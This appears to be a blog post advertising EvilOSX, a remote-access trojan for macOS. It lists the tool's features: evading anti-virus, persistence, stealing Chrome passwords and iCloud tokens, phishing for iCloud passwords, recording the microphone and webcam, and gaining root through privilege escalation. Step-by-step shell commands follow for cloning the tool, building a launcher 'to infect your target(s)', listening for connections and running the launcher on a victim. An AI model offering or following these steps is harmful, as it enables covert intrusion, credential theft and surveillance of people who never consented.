amazon

EvilOSX - Evil Remote Administration Tool (RAT) for macOS/OS X - Kali Linux 2018.2

EvilOSX - Evil Remote Administration Tool (RAT) for macOS/OS X - Kali Linux 2018.2

Features:
- Emulate a terminal instance
- Simple extendable module system
- No bot dependencies (pure python)
- Undetected by anti-virus (OpenSSL AES-256 encrypted payloads)
- Persistent
- Retrieve Chrome passwords
- Retrieve iCloud tokens and contacts
- Retrieve/monitor the clipboard
- Retrieve browser history (Chrome and Safari)
- Phish for iCloud passwords via iTunes
- iTunes (iOS) backup enumeration
- Record the microphone
- Take a desktop screenshot or picture using the webcam
- Attempt to get root via local privilege escalation
# Clone or download this repository
$ git clone https://github.com/Marten4n6/EvilOSX
# Install dependencies required by the server
$ sudo pip3 install -r requirements.txt
# Go into the repository
$ cd EvilOSX
# Build a launcher to infect your target(s)
$ python3 builder.py
# Start listening for connections
$ python3 start.py
# Lastly, run the built launcher on your target


Previous
Next Post »